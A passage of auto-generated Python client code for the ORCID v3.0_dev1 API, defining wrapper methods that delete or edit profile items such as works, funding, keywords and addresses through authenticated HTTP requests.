all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_external_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_external_identifier`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_external_identifier`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_funding(self, orcid, put_code, **kwargs):
"""
Delete a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_funding(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_funding_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_funding_with_http_info(orcid, put_code, **kwargs)
return data
def delete_funding_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_funding_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_funding" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_funding`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_funding`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_id_record(self, put_code, **kwargs):
"""
Delete a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_id_record(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_id_record_with_http_info(put_code, **kwargs)
else:
(data) = self.delete_group_id_record_with_http_info(put_code, **kwargs)
return data
def delete_group_id_record_with_http_info(self, put_code, **kwargs):
"""
Delete a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_id_record_with_http_info(put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_id_record" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_group_id_record`")
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_keyword(self, orcid, put_code, **kwargs):
"""
Delete keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_keyword(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_keyword_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_keyword_with_http_info(orcid, put_code, **kwargs)
return data
def delete_keyword_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_keyword_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_keyword" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_keyword`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_keyword`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_other_name(self, orcid, put_code, **kwargs):
"""
Delete other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_other_name(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_other_name_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_other_name_with_http_info(orcid, put_code, **kwargs)
return data
def delete_other_name_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_other_name_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_other_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_other_name`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_other_name`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_peer_review(self, orcid, put_code, **kwargs):
"""
Delete a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_peer_review(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_peer_review_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_peer_review_with_http_info(orcid, put_code, **kwargs)
return data
def delete_peer_review_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_peer_review_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_peer_review" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_peer_review`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_peer_review`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_researcher_url(self, orcid, put_code, **kwargs):
"""
Delete one researcher url from an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_researcher_url(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_researcher_url_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_researcher_url_with_http_info(orcid, put_code, **kwargs)
return data
def delete_researcher_url_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete one researcher url from an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_researcher_url_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_researcher_url" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_researcher_url`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_researcher_url`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_work(self, orcid, put_code, **kwargs):
"""
Delete a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_work(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_work_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_work_with_http_info(orcid, put_code, **kwargs)
return data
def delete_work_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_work_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_work" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_work`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_work`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def edit_address(self, orcid, put_code, **kwargs):
"""
Edit an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_address(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_address_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_address_with_http_info(orcid, put_code, **kwargs)
return data
def edit_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_address_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Address body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def edit_external_identifier_json(self, orcid, put_code, **kwargs):
"""
Edit external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_external_identifier_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_external_identifier_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_external_identifier_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_external_identifier_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_external_identifier_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param PersonExternalIdentifier body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_external_identifier_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_external_identifier_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_external_identifier_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def edit_keyword_json(self, orcid, put_code, **kwargs):
"""
Edit keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_keyword_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_keyword_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_keyword_json_with_http_info(orcid, put_code, **kwargs)
return data
def edit_keyword_json_with_http_info(self, orcid, put_code, **kwargs):
"""
Edit keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_keyword_json_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method edit_keyword_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `edit_keyword_json`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `edit_keyword_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def edit_other_name_json(self, orcid, put_code, **kwargs):
"""
Edit other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.edit_other_name_json(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.edit_other_name_json_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.edit_other_name_json_with_http_info(orcid, put_code, **kwargs)
return data
